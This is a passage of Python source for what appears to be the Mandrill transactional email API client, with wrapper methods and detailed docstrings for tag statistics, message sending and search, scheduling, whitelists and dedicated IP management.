with this tag in the last 90 days stats.last_90_days.soft_bounces (integer): the number of emails soft bounced with this tag in the last 90 days stats.last_90_days.rejects (integer): the number of emails rejected for sending this tag in the last 90 days stats.last_90_days.complaints (integer): the number of spam complaints with this tag in the last 90 days stats.last_90_days.unsubs (integer): the number of unsubscribes with 
this tag in the last 90 days stats.last_90_days.opens (integer): the number of times emails have been opened with this tag in the last 90 days stats.last_90_days.unique_opens (integer): the number of unique opens for emails sent with this tag in the last 90 days stats.last_90_days.clicks (integer): the number of URLs that have been clicked with this tag in the last 90 days stats.last_90_days.unique_clicks (integer): the number of unique clicks for emails sent with this tag in the last 90 days Raises: InvalidTagNameError: The requested tag does not exist or contains invalid characters InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {'tag': tag} return self.master.call('tags/info', _params) def time_series(self, tag): """Return the recent history (hourly stats for the last 30 days) for a tag Args: tag (string): an existing tag name Returns: array. the array of history information:: [] (struct): the stats for a single hour:: [].time (string): the hour as a UTC date string in YYYY-MM-DD HH:MM:SS format [].sent (integer): the number of emails that were sent during the hour [].hard_bounces (integer): the number of emails that hard bounced during the hour [].soft_bounces (integer): the number of emails that soft bounced during the hour [].rejects (integer): the number of emails that were rejected during the hour [].complaints (integer): the number of spam complaints received during the hour [].unsubs (integer): the number of unsubscribes received during the hour [].opens (integer): the number of emails opened during the hour [].unique_opens (integer): the number of unique opens generated by messages sent during the hour [].clicks (integer): the number of tracked URLs clicked during the hour [].unique_clicks (integer): the number of unique clicks generated by messages sent during the hour Raises: InvalidTagNameError: The requested tag does not exist or contains invalid characters 
InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {'tag': tag} return self.master.call('tags/time-series', _params) def all_time_series(self, ): """Return the recent history (hourly stats for the last 30 days) for all tags Returns: array. the array of history information:: [] (struct): the stats for a single hour:: [].time (string): the hour as a UTC date string in YYYY-MM-DD HH:MM:SS format [].sent (integer): the number of emails that were sent during the hour [].hard_bounces (integer): the number of emails that hard bounced during the hour [].soft_bounces (integer): the number of emails that soft bounced during the hour [].rejects (integer): the number of emails that were rejected during the hour [].complaints (integer): the number of spam complaints received during the hour [].unsubs (integer): the number of unsubscribes received during the hour [].opens (integer): the number of emails opened during the hour [].unique_opens (integer): the number of unique opens generated by messages sent during the hour [].clicks (integer): the number of tracked URLs clicked during the hour [].unique_clicks (integer): the number of unique clicks generated by messages sent during the hour Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {} return self.master.call('tags/all-time-series', _params) class Messages(object): def __init__(self, master): self.master = master def send(self, message, async=False, ip_pool=None, send_at=None): """Send a new transactional message through Mandrill Args: message (struct): the information on the message to send:: message.html (string): the full HTML content to be sent message.text (string): optional full text content to be sent message.subject (string): the message subject message.from_email (string): the sender email address. 
message.from_name (string): optional from name to be used message.to (array): an array of recipient information.:: message.to[] (struct): a single recipient's information.:: message.to[].email (string): the email address of the recipient message.to[].name (string): the optional display name to use for the recipient message.to[].type (string): the header type to use for the recipient, defaults to "to" if not provided message.headers (struct): optional extra headers to add to the message (most headers are allowed) message.important (boolean): whether or not this message is important, and should be delivered ahead of non-important messages message.track_opens (boolean): whether or not to turn on open tracking for the message message.track_clicks (boolean): whether or not to turn on click tracking for the message message.auto_text (boolean): whether or not to automatically generate a text part for messages that are not given text message.auto_html (boolean): whether or not to automatically generate an HTML part for messages that are not given HTML message.inline_css (boolean): whether or not to automatically inline all CSS styles provided in the message HTML - only for HTML documents less than 256KB in size message.url_strip_qs (boolean): whether or not to strip the query string from URLs when aggregating tracked URL data message.preserve_recipients (boolean): whether or not to expose all recipients in to "To" header for each email message.view_content_link (boolean): set to false to remove content logging for sensitive emails message.bcc_address (string): an optional address to receive an exact copy of each recipient's email message.tracking_domain (string): a custom domain to use for tracking opens and clicks instead of mandrillapp.com message.signing_domain (string): a custom domain to use for SPF/DKIM signing instead of mandrill (for "via" or "on behalf of" in email clients) message.return_path_domain (string): a custom domain to use for the messages's return-path 
message.merge (boolean): whether to evaluate merge tags in the message. Will automatically be set to true if either merge_vars or global_merge_vars are provided. message.global_merge_vars (array): global merge variables to use for all recipients. You can override these per recipient.:: message.global_merge_vars[] (struct): a single global merge variable:: message.global_merge_vars[].name (string): the global merge variable's name. Merge variable names are case-insensitive and may not start with _ message.global_merge_vars[].content (string): the global merge variable's content message.merge_vars (array): per-recipient merge variables, which override global merge variables with the same name.:: message.merge_vars[] (struct): per-recipient merge variables:: message.merge_vars[].rcpt (string): the email address of the recipient that the merge variables should apply to message.merge_vars[].vars (array): the recipient's merge variables:: message.merge_vars[].vars[] (struct): a single merge variable:: message.merge_vars[].vars[].name (string): the merge variable's name. Merge variable names are case-insensitive and may not start with _ message.merge_vars[].vars[].content (string): the merge variable's content message.tags (array): an array of string to tag the message with. Stats are accumulated using tags, though we only store the first 100 we see, so this should not be unique or change frequently. Tags should be 50 characters or less. Any tags starting with an underscore are reserved for internal use and will cause errors.:: message.tags[] (string): a single tag - must not start with an underscore message.subaccount (string): the unique id of a subaccount for this message - must already exist or will fail with an error message.google_analytics_domains (array): an array of strings indicating for which any matching URLs will automatically have Google Analytics parameters appended to their query string automatically. 
message.google_analytics_campaign (array|string): optional string indicating the value to set for the utm_campaign tracking parameter. If this isn't provided the email's from address will be used instead. message.metadata (array): metadata an associative array of user metadata. Mandrill will store this metadata and make it available for retrieval. In addition, you can select up to 10 metadata fields to index and make searchable using the Mandrill search api. message.recipient_metadata (array): Per-recipient metadata that will override the global values specified in the metadata parameter.:: message.recipient_metadata[] (struct): metadata for a single recipient:: message.recipient_metadata[].rcpt (string): the email address of the recipient that the metadata is associated with message.recipient_metadata[].values (array): an associated array containing the recipient's unique metadata. If a key exists in both the per-recipient metadata and the global metadata, the per-recipient metadata will be used. message.attachments (array): an array of supported attachments to add to the message:: message.attachments[] (struct): a single supported attachment:: message.attachments[].type (string): the MIME type of the attachment message.attachments[].name (string): the file name of the attachment message.attachments[].content (string): the content of the attachment as a base64-encoded string message.images (array): an array of embedded images to add to the message:: message.images[] (struct): a single embedded image:: message.images[].type (string): the MIME type of the image - must start with "image/" message.images[].name (string): the Content ID of the image - use <img src="cid:THIS_VALUE"> to reference the image in your HTML content message.images[].content (string): the content of the image as a base64-encoded string async (boolean): enable a background sending mode that is optimized for bulk sending. 
In async mode, messages/send will immediately return a status of "queued" for every recipient. To handle rejections when sending in async mode, set up a webhook for the 'reject' event. Defaults to false for messages with no more than 10 recipients; messages with more than 10 recipients are always sent asynchronously, regardless of the value of async. ip_pool (string): the name of the dedicated ip pool that should be used to send the message. If you do not have any dedicated IPs, this parameter has no effect. If you specify a pool that does not exist, your default pool will be used instead. send_at (string): when this message should be sent as a UTC timestamp in YYYY-MM-DD HH:MM:SS format. If you specify a time in the past, the message will be sent immediately. An additional fee applies for scheduled email, and this feature is only available to accounts with a positive balance. Returns: array. of structs for each recipient containing the key "email" with the email address and "status" as either "sent", "queued", or "rejected":: [] (struct): the sending results for a single recipient:: [].email (string): the email address of the recipient [].status (string): the sending status of the recipient - either "sent", "queued", "scheduled", "rejected", or "invalid" [].reject_reason (string): the reason for the rejection if the recipient status is "rejected" []._id (string): the message's unique id Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key PaymentRequiredError: The requested feature requires payment. UnknownSubaccountError: The provided subaccount id does not exist. 
Error: A general Mandrill error has occurred """ _params = {'message': message, 'async': async, 'ip_pool': ip_pool, 'send_at': send_at} return self.master.call('messages/send', _params) def send_template(self, template_name, template_content, message, async=False, ip_pool=None, send_at=None): """Send a new transactional message through Mandrill using a template Args: template_name (string): the immutable name or slug of a template that exists in the user's account. For backwards-compatibility, the template name may also be used but the immutable slug is preferred. template_content (array): an array of template content to send. Each item in the array should be a struct with two keys - name: the name of the content block to set the content for, and content: the actual content to put into the block:: template_content[] (struct): the injection of a single piece of content into a single editable region:: template_content[].name (string): the name of the mc:edit editable region to inject into template_content[].content (string): the content to inject message (struct): the other information on the message to send - same as /messages/send, but without the html content:: message.html (string): optional full HTML content to be sent if not in template message.text (string): optional full text content to be sent message.subject (string): the message subject message.from_email (string): the sender email address. 
message.from_name (string): optional from name to be used message.to (array): an array of recipient information.:: message.to[] (struct): a single recipient's information.:: message.to[].email (string): the email address of the recipient message.to[].name (string): the optional display name to use for the recipient message.to[].type (string): the header type to use for the recipient, defaults to "to" if not provided message.headers (struct): optional extra headers to add to the message (most headers are allowed) message.important (boolean): whether or not this message is important, and should be delivered ahead of non-important messages message.track_opens (boolean): whether or not to turn on open tracking for the message message.track_clicks (boolean): whether or not to turn on click tracking for the message message.auto_text (boolean): whether or not to automatically generate a text part for messages that are not given text message.auto_html (boolean): whether or not to automatically generate an HTML part for messages that are not given HTML message.inline_css (boolean): whether or not to automatically inline all CSS styles provided in the message HTML - only for HTML documents less than 256KB in size message.url_strip_qs (boolean): whether or not to strip the query string from URLs when aggregating tracked URL data message.preserve_recipients (boolean): whether or not to expose all recipients in to "To" header for each email message.view_content_link (boolean): set to false to remove content logging for sensitive emails message.bcc_address (string): an optional address to receive an exact copy of each recipient's email message.tracking_domain (string): a custom domain to use for tracking opens and clicks instead of mandrillapp.com message.signing_domain (string): a custom domain to use for SPF/DKIM signing instead of mandrill (for "via" or "on behalf of" in email clients) message.return_path_domain (string): a custom domain to use for the messages's return-path 
message.merge (boolean): whether to evaluate merge tags in the message. Will automatically be set to true if either merge_vars or global_merge_vars are provided. message.global_merge_vars (array): global merge variables to use for all recipients. You can override these per recipient.:: message.global_merge_vars[] (struct): a single global merge variable:: message.global_merge_vars[].name (string): the global merge variable's name. Merge variable names are case-insensitive and may not start with _ message.global_merge_vars[].content (string): the global merge variable's content message.merge_vars (array): per-recipient merge variables, which override global merge variables with the same name.:: message.merge_vars[] (struct): per-recipient merge variables:: message.merge_vars[].rcpt (string): the email address of the recipient that the merge variables should apply to message.merge_vars[].vars (array): the recipient's merge variables:: message.merge_vars[].vars[] (struct): a single merge variable:: message.merge_vars[].vars[].name (string): the merge variable's name. Merge variable names are case-insensitive and may not start with _ message.merge_vars[].vars[].content (string): the merge variable's content message.tags (array): an array of string to tag the message with. Stats are accumulated using tags, though we only store the first 100 we see, so this should not be unique or change frequently. Tags should be 50 characters or less. Any tags starting with an underscore are reserved for internal use and will cause errors.:: message.tags[] (string): a single tag - must not start with an underscore message.subaccount (string): the unique id of a subaccount for this message - must already exist or will fail with an error message.google_analytics_domains (array): an array of strings indicating for which any matching URLs will automatically have Google Analytics parameters appended to their query string automatically. 
message.google_analytics_campaign (array|string): optional string indicating the value to set for the utm_campaign tracking parameter. If this isn't provided the email's from address will be used instead. message.metadata (array): metadata an associative array of user metadata. Mandrill will store this metadata and make it available for retrieval. In addition, you can select up to 10 metadata fields to index and make searchable using the Mandrill search api. message.recipient_metadata (array): Per-recipient metadata that will override the global values specified in the metadata parameter.:: message.recipient_metadata[] (struct): metadata for a single recipient:: message.recipient_metadata[].rcpt (string): the email address of the recipient that the metadata is associated with message.recipient_metadata[].values (array): an associated array containing the recipient's unique metadata. If a key exists in both the per-recipient metadata and the global metadata, the per-recipient metadata will be used. message.attachments (array): an array of supported attachments to add to the message:: message.attachments[] (struct): a single supported attachment:: message.attachments[].type (string): the MIME type of the attachment message.attachments[].name (string): the file name of the attachment message.attachments[].content (string): the content of the attachment as a base64-encoded string message.images (array): an array of embedded images to add to the message:: message.images[] (struct): a single embedded image:: message.images[].type (string): the MIME type of the image - must start with "image/" message.images[].name (string): the Content ID of the image - use <img src="cid:THIS_VALUE"> to reference the image in your HTML content message.images[].content (string): the content of the image as a base64-encoded string async (boolean): enable a background sending mode that is optimized for bulk sending. 
In async mode, messages/send will immediately return a status of "queued" for every recipient. To handle rejections when sending in async mode, set up a webhook for the 'reject' event. Defaults to false for messages with no more than 10 recipients; messages with more than 10 recipients are always sent asynchronously, regardless of the value of async. ip_pool (string): the name of the dedicated ip pool that should be used to send the message. If you do not have any dedicated IPs, this parameter has no effect. If you specify a pool that does not exist, your default pool will be used instead. send_at (string): when this message should be sent as a UTC timestamp in YYYY-MM-DD HH:MM:SS format. If you specify a time in the past, the message will be sent immediately. An additional fee applies for scheduled email, and this feature is only available to accounts with a positive balance. Returns: array. of structs for each recipient containing the key "email" with the email address and "status" as either "sent", "queued", "scheduled", or "rejected":: [] (struct): the sending results for a single recipient:: [].email (string): the email address of the recipient [].status (string): the sending status of the recipient - either "sent", "queued", "rejected", or "invalid" [].reject_reason (string): the reason for the rejection if the recipient status is "rejected" []._id (string): the message's unique id Raises: UnknownTemplateError: The requested template does not exist PaymentRequiredError: The requested feature requires payment. InvalidKeyError: The provided API key is not a valid Mandrill API key UnknownSubaccountError: The provided subaccount id does not exist. 
        Error: A general Mandrill error has occurred
        """
        # NOTE(review): 'async' is a reserved word on Python 3.7+; this name
        # predates that and the enclosing signature is outside this hunk.
        # 'async' is also the wire name the Mandrill API expects.
        _params = {'template_name': template_name, 'template_content': template_content,
                   'message': message, 'async': async, 'ip_pool': ip_pool, 'send_at': send_at}
        return self.master.call('messages/send-template', _params)

    def search(self, query='*', date_from=None, date_to=None, tags=None, senders=None, api_keys=None, limit=100):
        """Search the content of recently sent messages, optionally narrowed
        by date range, tags and senders.

        Args:
           query (string): the search terms to find matching messages for
           date_from (string): start date
           date_to (string): end date
           tags (array): tag names to narrow the search to; returns messages that contain ANY of the tags
           senders (array): sender addresses to narrow the search to; returns messages sent by ANY of the senders
           api_keys (array): API keys to narrow the search to; returns messages sent by ANY of the keys
           limit (integer): the maximum number of results to return, defaults to 100, 1000 is the maximum

        Returns:
           array. of structs for each matching message: the message's unix
           timestamp, unique id, sender, template, subject, recipient email,
           tags, open and click counts (with per-event ts/ip/location/ua
           detail), sending state (sent, bounced, rejected), custom metadata,
           and a log of up to 3 smtp events (ts, type, diag)

        Raises:
           InvalidKeyError: The provided API key is not a valid Mandrill API key
           ServiceUnavailableError: The subsystem providing this API call is down for maintenance
           Error: A general Mandrill error has occurred
        """
        _params = {'query': query, 'date_from': date_from, 'date_to': date_to, 'tags': tags,
                   'senders': senders, 'api_keys': api_keys, 'limit': limit}
        return self.master.call('messages/search', _params)

    def search_time_series(self, query='*', date_from=None, date_to=None, tags=None, senders=None):
        """Search the content of recently sent messages and return the
        aggregated hourly stats for matching messages.

        Args:
           query (string): the search terms to find matching messages for
           date_from (string): start date
           date_to (string): end date
           tags (array): tag names to narrow the search to; returns messages that contain ANY of the tags
           senders (array): sender addresses to narrow the search to; returns messages sent by ANY of the senders

        Returns:
           array. of per-hour stat structs: the hour as a UTC date string in
           YYYY-MM-DD HH:MM:SS format, plus counts of sent, hard_bounces,
           soft_bounces, rejects, complaints, unsubs, opens, unique_opens,
           clicks and unique_clicks for that hour

        Raises:
           InvalidKeyError: The provided API key is not a valid Mandrill API key
           ServiceUnavailableError: The subsystem providing this API call is down for maintenance
           Error: A general Mandrill error has occurred
        """
        _params = {'query': query, 'date_from': date_from, 'date_to': date_to,
                   'tags': tags, 'senders': senders}
        return self.master.call('messages/search-time-series', _params)

    def info(self, id):
        """Get the information for a single recently sent message

        Args:
           id (string): the unique id of the message to get - passed as the "_id" field in webhooks, send calls, or search calls

        Returns:
           struct.
the information for the message:: ts (integer): the Unix timestamp from when this message was sent _id (string): the message's unique id sender (string): the email address of the sender template (string): the unique name of the template used, if any subject (string): the message's subject line email (string): the recipient email address tags (array): list of tags on this message:: tags[] (string): individual tag on this message opens (integer): how many times has this message been opened opens_detail (array): list of individual opens for the message:: opens_detail[] (struct): information on an individual open:: opens_detail[].ts (integer): the unix timestamp from when the message was opened opens_detail[].ip (string): the IP address that generated the open opens_detail[].location (string): the approximate region and country that the opening IP is located opens_detail[].ua (string): the email client or browser data of the open clicks (integer): how many times has a link been clicked in this message clicks_detail (array): list of individual clicks for the message:: clicks_detail[] (struct): information on an individual click:: clicks_detail[].ts (integer): the unix timestamp from when the message was clicked clicks_detail[].url (string): the URL that was clicked on clicks_detail[].ip (string): the IP address that generated the click clicks_detail[].location (string): the approximate region and country that the clicking IP is located clicks_detail[].ua (string): the email client or browser data of the click state (string): sending status of this message: sent, bounced, rejected metadata (struct): any custom metadata provided when the message was sent smtp_events (array): a log of up to 3 smtp events for the message:: smtp_events[] (struct): information about a specific smtp event:: smtp_events[].ts (integer): the Unix timestamp when the event occured smtp_events[].type (string): the message's state as a result of this event smtp_events[].diag (string): the SMTP 
response from the recipient's server Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key UnknownMessageError: The provided message id does not exist. Error: A general Mandrill error has occurred """ _params = {'id': id} return self.master.call('messages/info', _params) def content(self, id): """Get the full content of a recently sent message Args: id (string): the unique id of the message to get - passed as the "_id" field in webhooks, send calls, or search calls Returns: struct. the content of the message:: ts (integer): the Unix timestamp from when this message was sent _id (string): the message's unique id from_email (string): the email address of the sender from_name (string): the alias of the sender (if any) subject (string): the message's subject line to (struct): the message recipient's information:: to.email (string): the email address of the recipient to.name (string): the alias of the recipient (if any) tags (array): list of tags on this message:: tags[] (string): individual tag on this message headers (struct): the key-value pairs of the custom MIME headers for the message's main document text (string): the text part of the message, if any html (string): the HTML part of the message, if any attachments (array): an array of any attachments that can be found in the message:: attachments[] (struct): information about an individual attachment:: attachments[].name (string): the file name of the attachment attachments[].type (string): the MIME type of the attachment attachments[].content (string): the content of the attachment as a base64 encoded string Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key UnknownMessageError: The provided message id does not exist. 
Error: A general Mandrill error has occurred """ _params = {'id': id} return self.master.call('messages/content', _params) def parse(self, raw_message): """Parse the full MIME document for an email message, returning the content of the message broken into its constituent pieces Args: raw_message (string): the full MIME document of an email message Returns: struct. the parsed message:: subject (string): the subject of the message from_email (string): the email address of the sender from_name (string): the alias of the sender (if any) to (array): an array of any recipients in the message:: to[] (struct): the information on a single recipient:: to[].email (string): the email address of the recipient to[].name (string): the alias of the recipient (if any) headers (struct): the key-value pairs of the MIME headers for the message's main document text (string): the text part of the message, if any html (string): the HTML part of the message, if any attachments (array): an array of any attachments that can be found in the message:: attachments[] (struct): information about an individual attachment:: attachments[].name (string): the file name of the attachment attachments[].type (string): the MIME type of the attachment attachments[].binary (boolean): if this is set to true, the attachment is not pure-text, and the content will be base64 encoded attachments[].content (string): the content of the attachment as a text string or a base64 encoded string based on the attachment type images (array): an array of any embedded images that can be found in the message:: images[] (struct): information about an individual image:: images[].name (string): the Content-ID of the embedded image images[].type (string): the MIME type of the image images[].content (string): the content of the image as a base64 encoded string Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {'raw_message': raw_message} return 
self.master.call('messages/parse', _params) def send_raw(self, raw_message, from_email=None, from_name=None, to=None, async=False, ip_pool=None, send_at=None, return_path_domain=None): """Take a raw MIME document for a message, and send it exactly as if it were sent through Mandrill's SMTP servers Args: raw_message (string): the full MIME document of an email message from_email (string|null): optionally define the sender address - otherwise we'll use the address found in the provided headers from_name (string|null): optionally define the sender alias to (array|null): optionally define the recipients to receive the message - otherwise we'll use the To, Cc, and Bcc headers provided in the document:: to[] (string): the email address of the recipient async (boolean): enable a background sending mode that is optimized for bulk sending. In async mode, messages/sendRaw will immediately return a status of "queued" for every recipient. To handle rejections when sending in async mode, set up a webhook for the 'reject' event. Defaults to false for messages with no more than 10 recipients; messages with more than 10 recipients are always sent asynchronously, regardless of the value of async. ip_pool (string): the name of the dedicated ip pool that should be used to send the message. If you do not have any dedicated IPs, this parameter has no effect. If you specify a pool that does not exist, your default pool will be used instead. send_at (string): when this message should be sent as a UTC timestamp in YYYY-MM-DD HH:MM:SS format. If you specify a time in the past, the message will be sent immediately. return_path_domain (string): a custom domain to use for the messages's return-path Returns: array. 
of structs for each recipient containing the key "email" with the email address and "status" as either "sent", "queued", or "rejected":: [] (struct): the sending results for a single recipient:: [].email (string): the email address of the recipient [].status (string): the sending status of the recipient - either "sent", "queued", "scheduled", "rejected", or "invalid" [].reject_reason (string): the reason for the rejection if the recipient status is "rejected" []._id (string): the message's unique id Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key PaymentRequiredError: The requested feature requires payment. UnknownTemplateError: The requested template does not exist UnknownSubaccountError: The provided subaccount id does not exist. Error: A general Mandrill error has occurred """ _params = {'raw_message': raw_message, 'from_email': from_email, 'from_name': from_name, 'to': to, 'async': async, 'ip_pool': ip_pool, 'send_at': send_at, 'return_path_domain': return_path_domain} return self.master.call('messages/send-raw', _params) def list_scheduled(self, to=None): """Queries your scheduled emails by sender or recipient, or both. Args: to (string): an optional recipient address to restrict results to Returns: array. a list of up to 1000 scheduled emails:: [] (struct): a scheduled email:: []._id (string): the scheduled message id [].created_at (string): the UTC timestamp when the message was created, in YYYY-MM-DD HH:MM:SS format [].send_at (string): the UTC timestamp when the message will be sent, in YYYY-MM-DD HH:MM:SS format [].from_email (string): the email's sender address [].to (string): the email's recipient [].subject (string): the email's subject Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {'to': to} return self.master.call('messages/list-scheduled', _params) def cancel_scheduled(self, id): """Cancels a scheduled email. 
Args: id (string): a scheduled email id, as returned by any of the messages/send calls or messages/list-scheduled Returns: struct. information about the scheduled email that was cancelled.:: _id (string): the scheduled message id created_at (string): the UTC timestamp when the message was created, in YYYY-MM-DD HH:MM:SS format send_at (string): the UTC timestamp when the message will be sent, in YYYY-MM-DD HH:MM:SS format from_email (string): the email's sender address to (string): the email's recipient subject (string): the email's subject Raises: UnknownMessageError: The provided message id does not exist. InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {'id': id} return self.master.call('messages/cancel-scheduled', _params) def reschedule(self, id, send_at): """Reschedules a scheduled email. Args: id (string): a scheduled email id, as returned by any of the messages/send calls or messages/list-scheduled send_at (string): the new UTC timestamp when the message should sent. Mandrill can't time travel, so if you specify a time in past the message will be sent immediately Returns: struct. information about the scheduled email that was rescheduled.:: _id (string): the scheduled message id created_at (string): the UTC timestamp when the message was created, in YYYY-MM-DD HH:MM:SS format send_at (string): the UTC timestamp when the message will be sent, in YYYY-MM-DD HH:MM:SS format from_email (string): the email's sender address to (string): the email's recipient subject (string): the email's subject Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key UnknownMessageError: The provided message id does not exist. 
        Error: A general Mandrill error has occurred
        """
        _params = {'id': id, 'send_at': send_at}
        return self.master.call('messages/reschedule', _params)


class Whitelists(object):
    # Thin wrapper over the whitelists/* endpoints; `master` is the API
    # client whose call() performs the HTTP request.
    def __init__(self, master):
        self.master = master

    def add(self, email):
        """Adds an email to your email rejection whitelist. If the address is
        currently on your blacklist, that blacklist entry will be removed
        automatically.

        Args:
           email (string): an email address to add to the whitelist

        Returns:
           struct. a status object containing the address and the result of the operation::
               email (string): the email address you provided
               whether (boolean): whether the operation succeeded

        Raises:
           InvalidKeyError: The provided API key is not a valid Mandrill API key
           Error: A general Mandrill error has occurred
        """
        _params = {'email': email}
        return self.master.call('whitelists/add', _params)

    def list(self, email=None):
        """Retrieves your email rejection whitelist. You can provide an email
        address or search prefix to limit the results. Returns up to 1000 results.

        Args:
           email (string): an optional email address or prefix to search by

        Returns:
           array. up to 1000 whitelist entries::
               [] (struct): the information for each whitelist entry::
                   [].email (string): the email that is whitelisted
                   [].detail (string): a description of why the email was whitelisted
                   [].created_at (string): when the email was added to the whitelist

        Raises:
           InvalidKeyError: The provided API key is not a valid Mandrill API key
           Error: A general Mandrill error has occurred
        """
        _params = {'email': email}
        return self.master.call('whitelists/list', _params)

    def delete(self, email):
        """Removes an email address from the whitelist.

        Args:
           email (string): the email address to remove from the whitelist

        Returns:
           struct. a status object containing the address and whether the deletion succeeded::
               email (string): the email address that was removed from the whitelist
               deleted (boolean): whether the address was deleted successfully

        Raises:
           InvalidKeyError: The provided API key is not a valid Mandrill API key
           Error: A general Mandrill error has occurred
        """
        _params = {'email': email}
        return self.master.call('whitelists/delete', _params)


class Ips(object):
    # Thin wrapper over the ips/* endpoints; `master` is the API client
    # whose call() performs the HTTP request.
    def __init__(self, master):
        self.master = master

    def list(self, ):
        """Lists your dedicated IPs.

        Returns:
           array. an array of structs for each dedicated IP, including its
           address, creation time (UTC, YYYY-MM-DD HH:MM:SS), pool name,
           reverse-dns domain, custom dns status (enabled/valid/error) and
           warmup status (warming_up/start_at/end_at)

        Raises:
           InvalidKeyError: The provided API key is not a valid Mandrill API key
           Error: A general Mandrill error has occurred
        """
        _params = {}
        return self.master.call('ips/list', _params)

    def info(self, ip):
        """Retrieves information about a single dedicated ip.
Args: ip (string): a dedicated IP address Returns: struct. Information about the dedicated ip:: ip (string): the ip address created_at (string): the date and time that the dedicated IP was created as a UTC string in YYYY-MM-DD HH:MM:SS format pool (string): the name of the pool that this dedicated IP belongs to domain (string): the domain name (reverse dns) of this dedicated IP custom_dns (struct): information about the ip's custom dns, if it has been configured:: custom_dns.enabled (boolean): a boolean indicating whether custom dns has been configured for this ip custom_dns.valid (boolean): whether the ip's custom dns is currently valid custom_dns.error (string): if the ip's custom dns is invalid, this will include details about the error warmup (struct): information about the ip's warmup status:: warmup.warming_up (boolean): whether the ip is currently in warmup mode warmup.start_at (string): the start time for the warmup process as a UTC string in YYYY-MM-DD HH:MM:SS format warmup.end_at (string): the end date and time for the warmup process as a UTC string in YYYY-MM-DD HH:MM:SS format Raises: InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {'ip': ip} return self.master.call('ips/info', _params) def provision(self, warmup=False, pool=None): """Requests an additional dedicated IP for your account. Accounts may have one outstanding request at any time, and provisioning requests are processed within 24 hours. Args: warmup (boolean): whether to enable warmup mode for the ip pool (string): the id of the pool to add the dedicated ip to, or null to use your account's default pool Returns: struct. a description of the provisioning request that was created:: requested_at (string): the date and time that the request was created as a UTC timestamp in YYYY-MM-DD HH:MM:SS format Raises: IPProvisionLimitError: A dedicated IP cannot be provisioned while another request is pending. 
UnknownPoolError: The provided dedicated IP pool does not exist. PaymentRequiredError: The requested feature requires payment. InvalidKeyError: The provided API key is not a valid Mandrill API key NoSendingHistoryError: The user hasn't started sending yet. PoorReputationError: The user's reputation is too low to continue. Error: A general Mandrill error has occurred """ _params = {'warmup': warmup, 'pool': pool} return self.master.call('ips/provision', _params) def start_warmup(self, ip): """Begins the warmup process for a dedicated IP. During the warmup process, Mandrill will gradually increase the percentage of your mail that is sent over the warming-up IP, over a period of roughly 30 days. The rest of your mail will be sent over shared IPs or other dedicated IPs in the same pool. Args: ip (string): a dedicated ip address Returns: struct. Information about the dedicated IP:: ip (string): the ip address created_at (string): the date and time that the dedicated IP was created as a UTC string in YYYY-MM-DD HH:MM:SS format pool (string): the name of the pool that this dedicated IP belongs to domain (string): the domain name (reverse dns) of this dedicated IP custom_dns (struct): information about the ip's custom dns, if it has been configured:: custom_dns.enabled (boolean): a boolean indicating whether custom dns has been configured for this ip custom_dns.valid (boolean): whether the ip's custom dns is currently valid custom_dns.error (string): if the ip's custom dns is invalid, this will include details about the error warmup (struct): information about the ip's warmup status:: warmup.warming_up (boolean): whether the ip is currently in warmup mode warmup.start_at (string): the start time for the warmup process as a UTC string in YYYY-MM-DD HH:MM:SS format warmup.end_at (string): the end date and time for the warmup process as a UTC string in YYYY-MM-DD HH:MM:SS format Raises: UnknownIPError: The provided dedicated IP does not exist. 
InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {'ip': ip} return self.master.call('ips/start-warmup', _params) def cancel_warmup(self, ip): """Cancels the warmup process for a dedicated IP. Args: ip (string): a dedicated ip address Returns: struct. Information about the dedicated IP:: ip (string): the ip address created_at (string): the date and time that the dedicated IP was created as a UTC string in YYYY-MM-DD HH:MM:SS format pool (string): the name of the pool that this dedicated IP belongs to domain (string): the domain name (reverse dns) of this dedicated IP custom_dns (struct): information about the ip's custom dns, if it has been configured:: custom_dns.enabled (boolean): a boolean indicating whether custom dns has been configured for this ip custom_dns.valid (boolean): whether the ip's custom dns is currently valid custom_dns.error (string): if the ip's custom dns is invalid, this will include details about the error warmup (struct): information about the ip's warmup status:: warmup.warming_up (boolean): whether the ip is currently in warmup mode warmup.start_at (string): the start time for the warmup process as a UTC string in YYYY-MM-DD HH:MM:SS format warmup.end_at (string): the end date and time for the warmup process as a UTC string in YYYY-MM-DD HH:MM:SS format Raises: UnknownIPError: The provided dedicated IP does not exist. InvalidKeyError: The provided API key is not a valid Mandrill API key Error: A general Mandrill error has occurred """ _params = {'ip': ip} return self.master.call('ips/cancel-warmup', _params) def set_pool(self, ip, pool, create_pool=False): """Moves a dedicated IP to a different pool. Args: ip (string): a dedicated ip address pool (string): the name of the new pool to add the dedicated ip to create_pool (boolean): whether to create the pool if it does not exist; if false and the pool does not exist, an Unknown_Pool will be thrown. 
